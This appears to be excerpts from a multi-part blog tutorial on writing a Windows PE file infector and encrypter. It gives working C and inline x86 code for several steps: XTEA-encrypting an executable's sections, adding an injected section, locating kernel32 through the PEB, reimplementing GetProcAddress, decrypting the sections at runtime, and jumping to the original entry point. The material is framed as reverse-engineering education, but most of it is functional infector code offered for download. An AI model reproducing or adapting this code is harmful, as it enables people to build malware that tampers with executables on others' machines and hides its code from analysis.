//  num_rounds - number of rounds to run (0 leaves the block untouched)
//  blocks     - the two 32-bit halves of the block; overwritten with the ciphertext
//  key        - 128-bit key as four 32-bit words
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int &left = blocks[0];
    unsigned int &right = blocks[1];
    unsigned int sum = 0;
    for (unsigned int remaining = num_rounds; remaining != 0; --remaining) {
        const unsigned int mixed_right = ((right << 4) ^ (right >> 5)) + right;
        left += mixed_right ^ (sum + key[sum & 3]);
        sum += delta;
        const unsigned int mixed_left = ((left << 4) ^ (left >> 5)) + left;
        right += mixed_left ^ (sum + key[(sum >> 11) & 3]);
    }
}
 
//Unused, kept for testing/verification
//XTEA decryption of one 64-bit block, in place; the inverse of encrypt() for the same
//num_rounds and key. Not called by the injector itself, kept for testing/verification.
//  num_rounds - number of rounds to undo (0 leaves the block untouched)
//  blocks     - the two 32-bit halves of the block; overwritten with the plaintext
//  key        - 128-bit key as four 32-bit words
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]) {
    const unsigned int delta = 0x9E3779B9;
    unsigned int &left = blocks[0];
    unsigned int &right = blocks[1];
    unsigned int sum = delta * num_rounds;
    for (unsigned int remaining = num_rounds; remaining != 0; --remaining) {
        const unsigned int mixed_left = ((left << 4) ^ (left >> 5)) + left;
        right -= mixed_left ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        const unsigned int mixed_right = ((right << 4) ^ (right >> 5)) + right;
        left -= mixed_right ^ (sum + key[sum & 3]);
    }
}
 
//Reverses the byte order of a 32-bit value (0x11223344 -> 0x44332211).
inline unsigned int swap_endianess(unsigned int value) {
    const unsigned int highest_to_lowest = value >> 24;
    const unsigned int second_lowest_up = (value << 8) & 0x00FF0000;
    const unsigned int second_highest_down = (value >> 8) & 0x0000FF00;
    const unsigned int lowest_to_highest = value << 24;
    return highest_to_lowest | second_lowest_up | second_highest_down | lowest_to_highest;
}

Encrypter.h

#pragma once
#include "Injector.h"
 
//Encrypts the raw data of every section except .rdata, .rsrc and excluded_section_name
void encrypt_file(PIMAGE_NT_HEADERS nt_headers, pfile_info target_file, const char *excluded_section_name);
//XTEA-encrypts one 64-bit block (two 32-bit words) in place
void encrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
//Inverse of encrypt() for the same round count and key
void decrypt(unsigned int num_rounds, unsigned int blocks[2], unsigned int const key[4]);
//Reverses the byte order of a 32-bit value
unsigned int swap_endianess(unsigned int value);

A few general remarks about the code:

  • Programs utilizing TLS callbacks may or may not work properly (depending on what the callbacks do). Full support for TLS callbacks can be implemented without issue
  • An interesting idea would be to decrypt sections or pages as needed. This could be done by setting memory breakpoints on the sections or on individual pages. The instructions can be encrypted again afterwards once they’ve executed. This requires quite a bit of work in implementing a SEH handler in assembly and registering the exception in the process’s exception list.
  • This code only works on x86 executables. This is extremely obvious and not much can be done in that regard.
  • The source needs to be built in release mode with any sort of extra optimizations/security (ESP checking/security cookies) disabled.

The source code and compiled sample can be found here
A Visual Studio 2010 project can be found here
A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: Writing the Compiled Stub (3/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will explain the “bulk” of the file infector. It will focus on writing the code to be injected and how to take advantage of the compiler to generate the instructions to inject into the target application. I will clarify that generating the instructions to inject means that the infector will be writing part of itself into the target application, and not that it will generate an additional assembly listing with any compiler flags which is then injected into the target by a different means. The main concept is that this will be done by declaring a naked function whose functionality is independent of where in memory it is written and what program it is injected into (architecture limitations aside, obviously). The infector will then read the function’s contents in memory and write them into the target application. The injection code needs to do several important things:

  • Preserve the registers upon entry (simple pushad/popad instructions; I miss the hell out of these two instructions in x86-64).
  • Find and store the load address of the image and of kernel32.dll
  • Implement GetProcAddress as well as some C runtime functions such as strcmp and strlen
  • Decrypt all encrypted sections in memory
  • Return execution to the normal application

Finding the load address and the address of kernel32.dll is pretty straightforward. The technique that I used is an old shellcoding technique and should be compatible with Windows XP through Windows 7. It works by finding the Process Environment Block (PEB) and then traversing the InLoadOrderModuleList found in PEB_LDR_DATA->PPEB_LDR_DATA. The definitions for these structures are all found in the link above. InLoadOrderModuleList is not found on MSDN, but the NTInternals site has the “proper” definition. Using the PEB is a great way to do this since it can always be found at the same location, namely fs:[0x30]. What makes InLoadOrderModuleList so special is that the first entry will hold the load address of the image. This is great because now there’s no worry about randomized base addresses. Also, the third entry will hold the load address of kernel32.dll, which contains LoadLibrary and other very useful APIs such as VirtualProtect. The code for the injection function then, so far, looks like this:

//Excerpt: prologue of the injection stub and lookup of the two module base addresses
void __declspec(naked) injection_stub(void) {
    __asm { //Prologue, stub entry point
        pushad                   //Save context of entry point
        push ebp                //Set up stack frame
        mov ebp, esp
        sub esp, 0x200        //Space for local variables
 
    }
    PIMAGE_DOS_HEADER target_image_base;
    PIMAGE_DOS_HEADER kernel32_image_base;
    __asm {
        call get_module_list   //Get PEB
        mov ebx, eax            //Keep the module list pointer across both calls below
        push 0
        push ebx
        call get_dll_base       //Get image base of process
        mov [target_image_base], eax
        push 2
        push ebx
        call get_dll_base       //Get kernel32.dll image base
        mov [kernel32_image_base], eax
    }

A stack frame is set up so the local variables can be referenced without issue. The value subtracted from ESP to make space for the local variables does not need to be exact since there’s no way to tell how the compiler will allocate the local variables in the stack frame. The value simply needs to be large enough that the state of the stack won’t get messed up by these allocations. It is possible to go back and look at the assembly dump of the function and modify the value so that there’s just enough room for those worried about space/cleanliness. With that out of the way, the remainder of the code calls two other functions, get_module_list and get_dll_base, which get InLoadOrderModuleList and an entry in InLoadOrderModuleList respectively. These are implemented as follows:

///////////////////////////////////////////////////////////////////
//Gets the module list
//Preserves no registers, PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList returned in EAX
///////////////////////////////////////////////////////////////////
//Takes no arguments; follows PEB -> [PEB+0xC] -> [+0xC] and returns the result in EAX
__asm {
get_module_list:       
        mov eax, fs:[0x30]   //PEB
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA
        mov eax, [eax+0xC]  //PEB_LDR_DATA->PPEB_LDR_DATA->InLoadOrderModuleList
        retn
}
///////////////////////////////////////////////////////////////////
 
///////////////////////////////////////////////////////////////////
//Gets the DllBase member of the InLoadOrderModuleList structure
//Call as void *get_dll_base(void *InLoadOrderModuleList, int index)
///////////////////////////////////////////////////////////////////
//Follows `index` forward links from the list pointer, then returns the dword at +0x18 of
//the entry reached (DllBase) in EAX. Callee pops both arguments (ret 0x8); ECX is used as
//the loop counter.
//NOTE(review): for index 0 the code jumps to "done" before EAX is loaded from [ebp+0x8];
//it relies on the caller still holding the list pointer in EAX
__asm {
get_dll_base:
    push ebp
    mov ebp, esp
    cmp [ebp+0xC], 0x0      //Initial zero check
    je done
    mov ecx, [ebp+0xC]      //Set loop index
    mov eax, [ebp+0x8]      //PEB->PPEB_LDR_DATA->InLoadOrderModuleList address
    traverse_list:
        mov eax, [eax]        //Go to next entry
    loop traverse_list
    done:
        mov eax, [eax+0x18] //PEB->PPEB_LDR_DATA->InLoadOrderModuleList.DllBase
        mov esp, ebp
        pop ebp
        ret 0x8
}
///////////////////////////////////////////////////////////////////

The next step is to implement GetProcAddress. The code for this is shown below:

///////////////////////////////////////////////////////////////////
//Implementation of GetProcAddress
//Call as FARPROC GetProcAddress(HMODULE hModule, LPCSTR lpProcName)
//  [ebp+0x8] = hModule: base address of the loaded module whose export table is searched
//  [ebp+0xC] = lpProcName: name of the export to look up
//Returns the address of the export in EAX, or 0 (NULL) when no exported name matches.
//Only lookup by name is implemented; the table entry is always treated as a code RVA.
//The two arguments are removed from the stack by the callee (ret 0x8).
///////////////////////////////////////////////////////////////////
get_proc_address:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200          //Scratch area large enough for the compiler-placed locals below
    }
    PIMAGE_DOS_HEADER kernel32_dos_header;
    PIMAGE_NT_HEADERS kernel32_nt_headers;
    PIMAGE_EXPORT_DIRECTORY kernel32_export_dir;
    unsigned short *ordinal_table;
    unsigned long *function_table;
    FARPROC function_address;
    int function_names_equal;
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov kernel32_dos_header, eax
        mov function_names_equal, 0x0
        mov function_address, 0x0   //Result when the name is not found (was left uninitialized)
    }
    kernel32_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)kernel32_dos_header + kernel32_dos_header->e_lfanew);
    kernel32_export_dir = (PIMAGE_EXPORT_DIRECTORY)((DWORD_PTR)kernel32_dos_header + 
        kernel32_nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    for(unsigned long i = 0; i < kernel32_export_dir->NumberOfNames; ++i) {
        //AddressOfNames is an array of 32-bit RVAs, so the stride is sizeof(DWORD);
        //each RVA is rebased onto the module base to get the name string
        char *eat_entry = (*(char **)((DWORD_PTR)kernel32_dos_header + kernel32_export_dir->AddressOfNames + i * sizeof(DWORD)))
            + (DWORD_PTR)kernel32_dos_header;   //Current name in name table
        STRING_COMPARE([ebp+0xC], eat_entry) //Compare function in name table with the one we want to find
        __asm mov function_names_equal, eax
        if(function_names_equal == 1) {
            //Name index -> ordinal (AddressOfNameOrdinals) -> function RVA (AddressOfFunctions)
            ordinal_table = (unsigned short *)(kernel32_export_dir->AddressOfNameOrdinals + (DWORD_PTR)kernel32_dos_header);
            function_table = (unsigned long *)(kernel32_export_dir->AddressOfFunctions + (DWORD_PTR)kernel32_dos_header);
            function_address = (FARPROC)((DWORD_PTR)kernel32_dos_header + function_table[ordinal_table[i]]);
            break;
        }
    }
    __asm {
        mov eax, function_address
        mov esp, ebp
        pop ebp
        ret 0x8
    }
///////////////////////////////////////////////////////////////////

This function looks pretty complex, but in actuality it is pretty simple. The image below reproduced from Matt Pietrek’s article will clarify things a lot.

This function starts off by finding the export directory (IMAGE_EXPORT_DIRECTORY structure) in kernel32.dll. This structure contains all of the relevant information about the exports of kernel32.dll. A loop is set up to iterate through all of the exported function names. On each iteration an entry from the name table (AddressOfNames) is retrieved. This is the name of a function that is exported by the DLL (e.g. “LoadLibraryA”, “GetSystemInfo”, etc.). This string is then compared with the name of the function to find. If there is a match, the ordinal number is obtained from the ordinal table (AddressOfNameOrdinals). This is then used as an index into the function address table (AddressOfFunctions) to retrieve the address of the function. And that’s all there is to it. STRING_COMPARE is just a macro that calls the stub’s own implementations of strlen and a strcmp variant. The macro and the two functions are pretty straightforward and don’t really warrant any discussion. Now that GetProcAddress is implemented, the next step is to use it to decrypt the sections in memory. This will utilize the VirtualProtect API and also the decryption function for the XTEA block cipher. The function, in its entirety, is shown below:

///////////////////////////////////////////////////////////////////
//Decrypts all sections in the image, excluding .rdata/.rsrc/.inject
//Call as void decrypt_sections(void *image_base, void *kernel32_base)
//  [ebp+0x8] = image_base: base address of the loaded target image
//  [ebp+0xC] = kernel32_base: base address of kernel32.dll, used to resolve VirtualProtect
//Every section whose name does not match one of the three excluded names is decrypted
//in place, 8 bytes at a time, with 32-round XTEA. The original page protection is
//restored after each block has been written back.
//The two arguments are removed from the stack by the callee (ret 0x8).
///////////////////////////////////////////////////////////////////
decrypt_sections:
    __asm {
        push ebp
        mov ebp, esp
        sub esp, 0x200          //Scratch area large enough for the compiler-placed locals below
    }
    typedef BOOL (WINAPI *pVirtualProtect)(LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect,
        PDWORD lpflOldProtect);
    char *str_virtualprotect;
    char *str_section_name;
    char *str_rdata_name;
    char *str_rsrc_name;
    PIMAGE_DOS_HEADER target_dos_header;
    int section_offset;
    int section_names_equal;
    unsigned long old_protections;
    unsigned long unused_protections;   //Receives the value VirtualProtect reports when restoring
    pVirtualProtect virtualprotect_addr;
    //Each jmp goes to a label that calls straight back to the matching *back label.
    //The string bytes follow that call, so the return address popped here is the
    //address of the string itself.
    __asm { //String initializations
        jmp virtualprotect
        virtualprotectback:
            pop esi
            mov str_virtualprotect, esi
        jmp section_name
        section_nameback:
            pop esi
            mov str_section_name, esi
        jmp rdata_name
        rdata_nameback:
            pop esi
            mov str_rdata_name, esi
        jmp rsrc_name
        rsrc_nameback:
            pop esi
            mov str_rsrc_name, esi
    }
    __asm { //Initializations
        mov eax, [ebp+0x8]
        mov target_dos_header, eax
        mov section_offset, 0x0
        mov section_names_equal, 0x0
        push str_virtualprotect
        push [ebp+0xC]
        call get_proc_address
        mov virtualprotect_addr, eax
    }
    PIMAGE_NT_HEADERS target_nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)target_dos_header + target_dos_header->e_lfanew);
    for(unsigned long j = 0; j < target_nt_headers->FileHeader.NumberOfSections; ++j) {
        //Section headers follow IMAGE_NT_HEADERS back to back
        section_offset = (target_dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS) +
            (sizeof(IMAGE_SECTION_HEADER) * j));
        PIMAGE_SECTION_HEADER section_header = (PIMAGE_SECTION_HEADER)((DWORD_PTR)target_dos_header + section_offset);
        //Name is the first member of the header, so the header pointer doubles as the name pointer.
        //The three compare results are summed; 0 means none of the excluded names matched.
        STRING_COMPARE(str_section_name, section_header)
        __asm mov section_names_equal, eax
        STRING_COMPARE(str_rdata_name, section_header)
        __asm add section_names_equal, eax
        STRING_COMPARE(str_rsrc_name, section_header)
        __asm add section_names_equal, eax
        if(section_names_equal == 0) {
            unsigned char *current_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress);
            unsigned char *last_byte = 
                (unsigned char *)((DWORD_PTR)target_dos_header + section_header->VirtualAddress 
                + section_header->SizeOfRawData);
            const unsigned int num_rounds = 32;
            const unsigned int key[4] = {0x12345678, 0xAABBCCDD, 0x10101010, 0xF00DBABE};
            for(current_byte; current_byte < last_byte; current_byte += 8) {
                //Make the 8-byte block writable (sizeof(DWORD_PTR) * 2 in this 32-bit build)
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, PAGE_EXECUTE_READWRITE, &old_protections);
                //Load the block as two big-endian 32-bit words
                unsigned int block1 = (*current_byte << 24) | (*(current_byte+1) << 16) |
                    (*(current_byte+2) << 8) | *(current_byte+3);
                unsigned int block2 = (*(current_byte+4) << 24) | (*(current_byte+5) << 16) |
                    (*(current_byte+6) << 8) | *(current_byte+7);
                unsigned int full_block[] = {block1, block2};
                //XTEA decipher: run the rounds backwards starting from sum = delta * num_rounds
                unsigned int delta = 0x9E3779B9;
                unsigned int sum = (delta * num_rounds);
                for (unsigned int i = 0; i < num_rounds; ++i) {
                    full_block[1] -= (((full_block[0] << 4) ^ (full_block[0] >> 5)) + full_block[0]) ^ (sum + key[(sum >> 11) & 3]);
                    sum -= delta;
                    full_block[0] -= (((full_block[1] << 4) ^ (full_block[1] >> 5)) + full_block[1]) ^ (sum + key[sum & 3]);
                }
                //Store the plaintext back big-endian while the block is still writable
                *(current_byte+3) = (full_block[0] & 0x000000FF);
                *(current_byte+2) = (full_block[0] & 0x0000FF00) >> 8;
                *(current_byte+1) = (full_block[0] & 0x00FF0000) >> 16;
                *(current_byte+0) = (full_block[0] & 0xFF000000) >> 24;
                *(current_byte+7) = (full_block[1] & 0x000000FF);
                *(current_byte+6) = (full_block[1] & 0x0000FF00) >> 8;
                *(current_byte+5) = (full_block[1] & 0x00FF0000) >> 16;
                *(current_byte+4) = (full_block[1] & 0xFF000000) >> 24;
                //Restore the original protection only after the write. VirtualProtect
                //requires a valid lpflOldProtect pointer; passing NULL makes the call fail.
                virtualprotect_addr(current_byte, sizeof(DWORD_PTR) * 2, old_protections, &unused_protections);
            }
        }
        section_names_equal = 0;
    }
    __asm {
        mov esp, ebp
        pop ebp
        ret 0x8
    }

The first thing to note is how string initialization is done. Each string has its own label at the bottom of the function; the code jumps to that label, which performs a call back to the instruction following the jump. Immediately after this call instruction the raw bytes of the string are emitted. This means that when the call is performed, the return address pushed on the stack will be that of the first byte in the string. Back at the label that is called, the return address can therefore be popped off and stored in the appropriate string variable. What follows then is that the address of VirtualProtect is retrieved. This function will be used to give PAGE_EXECUTE_READWRITE permission to the block of bytes to be decrypted. This is needed since some sections do not have the appropriate read/write/execute permissions, and will cause a crash if they have an unallowed action performed on them. Eight bytes are read from the section in memory at a time and the decryption routine is performed on them. Sections named .rdata, .rsrc, and .inject are not decrypted. This is because .rdata and .rsrc were not encrypted initially, and because .inject is the section name of the injected code. The decrypted bytes are written into memory and the loop continues until all bytes have been decrypted.

The last thing that needs to be done is to jump back to the original entry point. This is done with the following code:

//Leaves the stub: rebuilds the original entry point address, restores the registers
//saved by the prologue (pushad / push ebp) and jumps to the original entry point.
__asm { //Epilogue, stub exit point
    mov eax, target_image_base  //EAX = load address of the target image
    add eax, 0xCCDDEEFF     //Signature to be replaced by original entry point (OEP)
    mov esp, ebp            //Drop the locals; ESP now points at the EBP saved by the prologue
    mov [esp+0x20], eax     //Store OEP in EAX through ESP to preserve across popad
                            //(saved EBP at +0, then the pushad block; its EAX slot is at +0x20)
    pop ebp
    popad                   //Restore thread context, with OEP in EAX
    jmp eax                 //Jump to OEP
}

In the epilogue of the code to inject, the load address is moved into EAX. Then the dummy value of 0xCCDDEEFF is added to it. This value actually serves as a signature and is replaced by the injector with the original entry point. This value is then moved into [ESP+0x20], which is where EAX is in the stack after the pushad and push ebp instructions. The stack frame is then destroyed and the registers are restored to what they would be if there was no injected code (except EAX now contains the original entry point). A jump is made to EAX and now execution can be returned to the normal application. Shown below are examples of how instructions look when the application starts. Notice that none of the instructions in the original entry point make sense (this is because they’re encrypted). After the stub finishes its decryption routine, the instructions are returned to normal.

Encrypted instructions in the .text section of the process. OllyDbg’s analysis on them couldn’t make any sense of it.

The decrypted code at the entry point of the program. This image was taken after the jump to the original entry point.

 

A downloadable PDF of this post can be found here

Writing a File Infector/Encrypter: PE File Modification/Section Injection (2/4)

Filed under: Cryptography,General x86,Reverse Engineering — admin @ 5:54 PM

This post will mainly focus on how to write content into a portable executable (PE) file. The code shown consists of excerpts from the file infector and explanations as to the usage and functionality. The material makes the most sense in context with the source code listing in part 4. Some good background reading and reference material:

  1. Microsoft PE and COFF specification
  2. An In-Depth Look into the Win32 Portable Executable File Format
  3. Inject your code to a Portable Executable

The third article is especially useful, but takes a much different approach to injecting code, and also does not work for applications that use randomized base addresses.

The general concept presented, and what is used in the file infector, is adding a new section to a PE file. The PE structure is best illustrated with tools such as LordPE. A PE file is organized into several structures. These hold offsets into the file for certain properties. This is best illustrated with a graphic

The IMAGE_DOS_HEADER structure (reproduced below) is shown in the graphic above

// Header found at the very start of a PE file / loaded image (reproduced from the Windows headers).
// Fields map one-to-one onto file offsets: e_magic is the first WORD, e_cblp the second, and so on.
// Only e_magic and e_lfanew are used by the code in this series.
typedef struct _IMAGE_DOS_HEADER
{
     WORD e_magic;      // Signature; add_section requires 0x5A4D here
     WORD e_cblp;
     WORD e_cp;
     WORD e_crlc;
     WORD e_cparhdr;
     WORD e_minalloc;
     WORD e_maxalloc;
     WORD e_ss;
     WORD e_sp;
     WORD e_csum;
     WORD e_ip;
     WORD e_cs;
     WORD e_lfarlc;
     WORD e_ovno;
     WORD e_res[4];
     WORD e_oemid;
     WORD e_oeminfo;
     WORD e_res2[10];
     LONG e_lfanew;     // Offset from the start of the file/image to IMAGE_NT_HEADERS
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

These match up with offsets in the file (e_magic is the first WORD in the file, e_cblp is the second WORD, and so on). The most important property here is e_lfanew. This is an offset to a different structure, IMAGE_NT_HEADERS (reproduced below):

// Located at (image base + IMAGE_DOS_HEADER.e_lfanew); reproduced from the Windows headers.
typedef struct _IMAGE_NT_HEADERS {
  DWORD                 Signature;
  IMAGE_FILE_HEADER     FileHeader;      // Holds NumberOfSections, which add_section increments
  IMAGE_OPTIONAL_HEADER OptionalHeader;  // Alignments, entry point, image size, data directories
} IMAGE_NT_HEADERS, *PIMAGE_NT_HEADERS;

This structure contains two additional structures, IMAGE_FILE_HEADER and IMAGE_OPTIONAL_HEADER (reproduced below):

// Optional header of a 32-bit PE image (reproduced from the Windows headers).
// Comments are given only for the fields that the code in this series reads or writes.
typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;                 // add_section requires 0x010B here
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;   // Rewritten by change_file_oep to point at the injected section
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;
  DWORD                SectionAlignment;      // Boundary used for a section's VirtualAddress in add_section
  DWORD                FileAlignment;         // Boundary used for a section's PointerToRawData in add_section
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;           // Updated by add_section to cover the new section
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES]; // get_proc_address reads the IMAGE_DIRECTORY_ENTRY_EXPORT entry
} IMAGE_OPTIONAL_HEADER, *PIMAGE_OPTIONAL_HEADER;

Together with IMAGE_FILE_HEADER, which holds the current number of sections, this structure holds all of the information that is needed to inject a section into a PE file: the needed file alignment, section alignment, the size of the image, and so on. The last important structure that is required is IMAGE_SECTION_HEADER (reproduced below):

// One entry of the section table that follows IMAGE_NT_HEADERS (reproduced from the Windows headers).
// add_section fills out a new entry of this type; the other routines read existing entries.
typedef struct _IMAGE_SECTION_HEADER {
  BYTE  Name[IMAGE_SIZEOF_SHORT_NAME];  // Section name, e.g. ".rdata"; add_section copies 8 bytes into it
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;                  // Size of the section in memory
  } Misc;
  DWORD VirtualAddress;                 // Offset of the section from the image base once loaded
  DWORD SizeOfRawData;                  // Number of bytes of section data in the file
  DWORD PointerToRawData;               // Offset of the section data from the start of the file
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;                // IMAGE_SCN_* flags (read/execute/code for the injected section)
} IMAGE_SECTION_HEADER, *PIMAGE_SECTION_HEADER;

This structure contains all of the important information about a section in a PE file. It is the structure that has to be (partially) filled out and then written into the file. It will be written following the last section header, and the value holding the number of sections in IMAGE_FILE_HEADER will be incremented and saved so that this section is recognized.

The general idea then is to map the file to memory, find the appropriate structures (IMAGE_DOS_HEADER and IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER), and write our own IMAGE_SECTION_HEADER structure to the file.

The function to map a file to memory is shown below

// Opens file_name for exclusive read/write access and maps it into memory.
//   file_name        - path of the existing file to map
//   stub_size        - number of bytes the caller intends to append; only used when append_mode is set
//   append_mode      - when true the mapping (and therefore the file) is grown by
//                      stub_size + sizeof(DWORD_PTR) bytes beyond the current file size
//   mapped_file_info - receives the file handle, mapping handle and view pointer on success
// Returns true on success. On failure a message is printed, every handle opened so far is
// closed, mapped_file_info is left untouched and false is returned.
bool map_file(const wchar_t *file_name, unsigned int stub_size, bool append_mode, pfile_info mapped_file_info) {
    void *file_handle = CreateFile(file_name, GENERIC_READ | GENERIC_WRITE, 0,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if(file_handle == INVALID_HANDLE_VALUE) {
        wprintf(L"Could not open %s", file_name);
        return false;
    }
    unsigned int file_size = GetFileSize(file_handle, NULL);
    if(file_size == INVALID_FILE_SIZE) {
        wprintf(L"Could not get file size for %s", file_name);
        CloseHandle(file_handle);   // Previously leaked on this path
        return false;
    }
    if(append_mode) {
        // A mapping larger than the file extends the file on disk to the mapping size
        file_size += (stub_size + sizeof(DWORD_PTR));
    }
    void *file_map_handle = CreateFileMapping(file_handle, NULL, PAGE_READWRITE, 0,
        file_size, NULL);
    if(file_map_handle == NULL) {
        wprintf(L"File map could not be opened");
        CloseHandle(file_handle);
        return false;
    }
    void *file_mem_buffer = MapViewOfFile(file_map_handle, FILE_MAP_WRITE, 0, 0, file_size);
    if(file_mem_buffer == NULL) {
        wprintf(L"Could not map view of file");
        CloseHandle(file_map_handle);
        CloseHandle(file_handle);
        return false;
    }
    mapped_file_info->file_handle = file_handle;
    mapped_file_info->file_map_handle = file_map_handle;
    mapped_file_info->file_mem_buffer = (unsigned char*)file_mem_buffer;
    return true;
}

This function takes in the target file name, a stub size which is the number of bytes to write into the file, an append mode flag which is set when the file is going to be extended, and a pfile_info structure which will be filled out upon a successful return. The append mode flag is needed because the target file needs to be opened twice: the first time to obtain the section alignment, and then a second time (after closing it) to write in the instructions with an aligned stub_size parameter. The function demonstrates a pretty straightforward use of the Windows API to map a file into memory. The file_info structure is shown below:

// Result of a successful map_file call; map_file fills in all three members.
typedef struct {
    void *file_handle;              // Handle returned by CreateFile
    void *file_map_handle;          // Handle returned by CreateFileMapping
    unsigned char *file_mem_buffer; // Start of the view returned by MapViewOfFile
} file_info, *pfile_info;

Now since the file is mapped into memory, it is possible to obtain pointers to the appropriate structures. These can be obtained directly through typecasting the file buffer. An example of how to obtain them is shown below:

// The mapped file begins with the DOS header; its e_lfanew field gives the offset
// (from the start of the mapping) at which the NT headers are found.
PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)target_file->file_mem_buffer;
PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);

Once the file is mapped, it is possible to start adding the section. The code to add a section is shown below:

//Reference: http://www.codeproject.com/KB/system/inject2exe.aspx
// Appends a new readable/executable code section header to the section table of a mapped PE32 file.
//   section_name - name of the new section; at most 8 characters are stored
//   section_size - size of the new section (the caller passes a value already aligned to SectionAlignment)
//   image_addr   - start of the memory-mapped file
// On success NumberOfSections and SizeOfImage are updated and a pointer to the new header
// (inside the mapping) is returned. Returns NULL, after printing a message, when the headers
// are not those of a PE32 image, when the file has no sections, or when the header area has
// no room left for one more section header.
PIMAGE_SECTION_HEADER add_section(const char *section_name, unsigned int section_size, void *image_addr) {
    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)image_addr;
    if(dos_header->e_magic != IMAGE_DOS_SIGNATURE) {            // 0x5A4D
        wprintf(L"Could not retrieve DOS header from %p", image_addr);
        return NULL;
    }
    PIMAGE_NT_HEADERS nt_headers = (PIMAGE_NT_HEADERS)((DWORD_PTR)dos_header + dos_header->e_lfanew);
    if(nt_headers->OptionalHeader.Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC) {    // 0x010B
        wprintf(L"Could not retrieve NT header from %p", dos_header);
        return NULL;
    }
    if(nt_headers->FileHeader.NumberOfSections == 0) {
        // The new section is positioned relative to the last existing one
        wprintf(L"No existing sections found in %p", image_addr);
        return NULL;
    }
    const int name_max_length = IMAGE_SIZEOF_SHORT_NAME;
    PIMAGE_SECTION_HEADER last_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections - 1);
    PIMAGE_SECTION_HEADER new_section = IMAGE_FIRST_SECTION(nt_headers) + (nt_headers->FileHeader.NumberOfSections);
    // The section table lives inside the header area; writing past SizeOfHeaders would
    // overwrite the raw data of the first section.
    const DWORD_PTR new_header_end = (DWORD_PTR)(new_section + 1) - (DWORD_PTR)image_addr;
    if(new_header_end > nt_headers->OptionalHeader.SizeOfHeaders) {
        wprintf(L"No room for another section header in %p", image_addr);
        return NULL;
    }
    memset(new_section, 0, sizeof(IMAGE_SECTION_HEADER));
    new_section->Characteristics = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE;
    // Copy at most 8 characters and stop at the terminator so a short name is not over-read;
    // the memset above leaves the remainder of Name zero-padded.
    for(int i = 0; i < name_max_length && section_name[i] != '\0'; ++i) {
        new_section->Name[i] = (BYTE)section_name[i];
    }
    new_section->Misc.VirtualSize = section_size;
    new_section->PointerToRawData = align_to_boundary(last_section->PointerToRawData + last_section->SizeOfRawData,
        nt_headers->OptionalHeader.FileAlignment);
    new_section->SizeOfRawData = align_to_boundary(section_size, nt_headers->OptionalHeader.SectionAlignment);
    new_section->VirtualAddress = align_to_boundary(last_section->VirtualAddress + last_section->Misc.VirtualSize,
        nt_headers->OptionalHeader.SectionAlignment);
    nt_headers->OptionalHeader.SizeOfImage =  new_section->VirtualAddress + new_section->Misc.VirtualSize;
    nt_headers->FileHeader.NumberOfSections++;
    return new_section;
}

Understanding this function is pretty straightforward as it follows what was said above. It takes in the name of the new section, the size of the new section (aligned to IMAGE_NT_HEADERS.IMAGE_OPTIONAL_HEADER.SectionAlignment), and address of the memory mapped file. The IMAGE_DOS_HEADER and IMAGE_NT_HEADERS structures are obtained and the properties in the IMAGE_NT_HEADERS structure are used to properly fill out a custom IMAGE_SECTION_HEADER structure. The last section in the file is obtained and a new one is made following it. This structure is the new section to be added. The important thing to note is that a lot of the properties need to be aligned. Once these properties are filled out, the size of the image is updated and the number of sections is incremented. Now the new section will be recognized. What is left to be done is to write the instructions that this section contains, and to change the entry point to point to this new section. Writing in the instructions is extremely simple:

// Copies the stub's machine code into the raw data area of the given section.
